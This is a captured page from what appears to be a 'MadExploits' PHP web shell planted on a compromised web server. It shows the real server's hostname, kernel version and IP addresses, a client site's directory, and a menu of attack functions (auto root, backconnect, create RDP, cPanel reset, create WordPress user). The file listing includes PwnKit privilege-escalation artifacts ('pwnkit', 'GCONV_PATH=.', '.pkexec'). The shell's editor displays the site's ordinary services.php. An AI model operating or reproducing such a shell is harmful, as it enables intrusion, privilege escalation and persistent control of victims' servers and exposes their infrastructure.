Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.148.105.152
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
auswellbeing /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auswellbeing
[ DIR ]
drwxr-xr-x
config.ini
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
old
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
about.php
3.54
KB
-rw-r--r--
adjustment_support.php
48
B
-rw-r--r--
blog.php
2.65
KB
-rw-r--r--
check.php
718
B
-rw-r--r--
counselling_for_carers.php
48
B
-rw-r--r--
create.php
7.88
KB
-rw-r--r--
delete.php
1.42
KB
-rw-r--r--
front.check.login.php
740
B
-rw-r--r--
index.php
9.44
KB
-rw-r--r--
mindfulness_practice.php
48
B
-rw-r--r--
multilingual.php
48
B
-rw-r--r--
personal_development.php
48
B
-rw-r--r--
post.php
3.53
KB
-rw-r--r--
process.php
3.47
KB
-rw-r--r--
process_new.php
3.14
KB
-rw-r--r--
process_seo.php
1
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
relationship_skills.php
48
B
-rw-r--r--
service-data-template.php
2.57
KB
-rw-r--r--
service-data.php
1.45
KB
-rw-r--r--
services.php
3.47
KB
-rw-r--r--
update.php
10.89
KB
-rw-r--r--
upload.image.php
540
B
-rw-r--r--
upload.image.sm.php
561
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.php
<?php include( "includes/header.php");?> <section class="page_breadcrumbs ds background_cover section_padding_50"> <div class="container"> <div class="row"> <div class="col-sm-12 text-center"> <h2>Our Services</h2> <ol class="breadcrumb divided_content wide_divider"> <li> <a href="index.php"> Home </a> </li> <li class="active">Services</li> </ol> </div> </div> </div> </section> <!-- sevices --> <section class="back-w p-tb40"> <div class="container"> <div class="row"> <div class="col-sm-12 text-center"> <h2 class="section_header with_icon"> <?php echo getContent($db, "b3", "r1c1")[3]; ?> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=services&type=title&id=<?php echo getContent($db, "b3", "r1c1")[0]; ?>" class="btn btn-warning btn-lg" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> <?php }?> </h2> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(ct, 'e') ?>&ref=services&type=content&id=<?php echo getContent($db, "b3", "r2c1")[0]; ?>" style="float:left;" class="btn btn-warning btn-sm" title="Update This Content"> <i class="rt-icon2-pencil"></i> </a> <?php }?> <?php echo getContent($db, "b3", "r2c1")[3]; ?> </div> </div> <div class="row columns_padding_0 columns_margin_0 fontsize_16"> <?php if(isset($_SESSION['login'])){ ?> <a href="create.php?type=services" title="Add New Service"> <div class="col-md-3 col-sm-6 pd-b-15" style="position:relative;"> <div class="with_padding text-center teaser hover_shadow"> <i class="rt-icon2-plus" style="font-size: 5.6em;"></i> <h4> Add Service </h4> <p></p> <div class="dez-post-readmore"> </div> </div> </div> </a> <?php }?> <?php $services = getData($db, st); ?> <?php while($service = $services->fetch_assoc()){ ?> <div class="col-md-3 col-sm-6 pd-b-15" style="position:relative;"> <?php if(isset($_SESSION['login'])){ ?> <a href="update.php?tb=<?=$tool->ed(st, 'e') ?>&ref=services&type=services&id=<?php echo $service['id']; ?>" style="position: absolute; top:0; left:15px;z-index:999;opacity:0.8;" class="btn btn-warning btn-sm" title="Update This Content"> <i class="rt-icon2-pencil"></i> Edit </a> <a href="delete.php?type=services&tbl=<?=$tool->ed(st, 'e') ?>&id=<?php echo $service['id']; ?>&ref=<?php echo $service['service_page_name']; ?>" style="position: absolute; top:0; right:15px;z-index:999;opacity:0.8;" class="btn btn-danger btn-sm deleteServiceBtn" title="Delete This Content"> <i class="rt-icon2-trash"></i> Delete </a> <?php }?> <div class="with_padding text-center teaser hover_shadow"> <img src="<?=$service['service_sm_img'] ?>" alt="<?=$service['service_heading'] ?>"> <h4> <a href="<?=$service['service_page_name'] ?>.php"> <?=$service['service_heading'] ?></a> </h4> <p></p> <div class="dez-post-readmore"> <a href="<?=$service['service_page_name'] ?>.php" title="READ MORE" rel="bookmark">Read More <i class="fa fa-angle-double-right"></i></a> </div> </div> </div> <?php } ?> </div> </div> </section> <?php include( "includes/subscribe.php");?> <!-- end section--> <?php include( "includes/footer.php");?>
Close